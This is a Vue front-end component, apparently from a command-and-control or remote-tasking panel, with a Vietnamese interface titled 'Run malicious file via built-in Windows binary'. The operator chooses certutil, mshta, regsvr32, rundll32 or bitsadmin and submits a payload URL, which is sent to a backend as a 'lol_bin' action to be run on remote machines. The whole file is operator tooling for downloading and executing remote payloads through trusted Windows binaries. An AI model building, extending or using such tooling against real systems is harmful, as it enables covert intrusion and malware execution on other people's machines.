<template>
  <button type="button" class="btn" @click="dialog?.showModal()">
    Tạo lệnh
  </button>
  <dialog ref="dialog" class="modal" :aria-labelledby="`${id}-title`">
    <div class="modal-box max-h-[90dvh] overflow-y-auto rounded-none">
      <h3 :id="`${id}-title`" class="mb-4 text-lg font-bold">
        Chạy file độc hại qua Windows binary có sẵn
      </h3>
      <fieldset class="space-y-4" :disabled="action_store.loading.create_action">
        <legend class="sr-only">Loại công cụ</legend>
        <div class="flex flex-wrap items-center gap-4">
          <label
            v-for="tool in tools"
            :key="tool.value"
            class="flex items-center gap-2 text-sm"
          >
            <input
              v-model="run_with"
              type="radio"
              :name="`${id}-tool`"
              :value="tool.value"
              class="radio radio-sm radio-primary"
              @change="error = ''"
            />
            {{ tool.label }}
          </label>
        </div>

        <div>
          <label :for="`${id}-url`" class="text-base-content/70 mb-1 block text-xs font-semibold"
            >URL</label
          >
          <input
            :id="`${id}-url`"
            v-model="url"
            type="url"
            inputmode="url"
            class="input input-bordered w-full rounded-none"
            placeholder="https://example.com/payload.dll"
            @input="error = ''"
          />
        </div>
      </fieldset>
      <p v-if="error" role="alert" class="text-error mt-3 text-sm">
        {{ error }}
      </p>
      <div class="modal-action">
        <button type="button" class="btn rounded-none" @click="dialog?.close()">
          Đóng
        </button>
        <button
          type="button"
          class="btn btn-primary rounded-none"
          :disabled="action_store.loading.create_action"
          @click="submit"
        >
          {{ action_store.loading.create_action ? "Đang gửi…" : "Submit" }}
        </button>
      </div>
    </div>
  </dialog>
</template>

<script setup lang="ts">
import { ref, useId } from "vue";
import { use_action } from "../ExplorerV2/useAction";

// Backend run_with values, typos included on purpose (certuil, mshata).
const tools = [
  { value: "certuil", label: "Certutil" },
  { value: "mshata", label: "Mshta" },
  { value: "regsvr32", label: "Regsvr32" },
  { value: "rundll32", label: "Rundll32" },
  { value: "bitsadmin", label: "Bitsadmin" },
] as const;

const id = useId();
const run_with = ref<(typeof tools)[number]["value"]>("certuil");
const url = ref("");
const error = ref("");
const dialog = ref<HTMLDialogElement>();
const action_store = use_action();

const submit = async () => {
  if (action_store.loading.create_action) return;
  error.value = "";
  const value = url.value.trim();
  if (!value) {
    error.value = "Vui lòng nhập URL!";
    return;
  }
  try {
    new URL(value);
  } catch {
    error.value = "URL không hợp lệ!";
    return;
  }
  try {
    await action_store.create_action({
      type: "lol_bin",
      action: "0",
      args: value,
      run_with: run_with.value,
    });
    url.value = "";
    action_store.get_action_history({ type: "lol_bin" });
    dialog.value?.close();
  } catch {
    error.value = "Không thể tạo lệnh. Vui lòng thử lại.";
  }
};
</script>
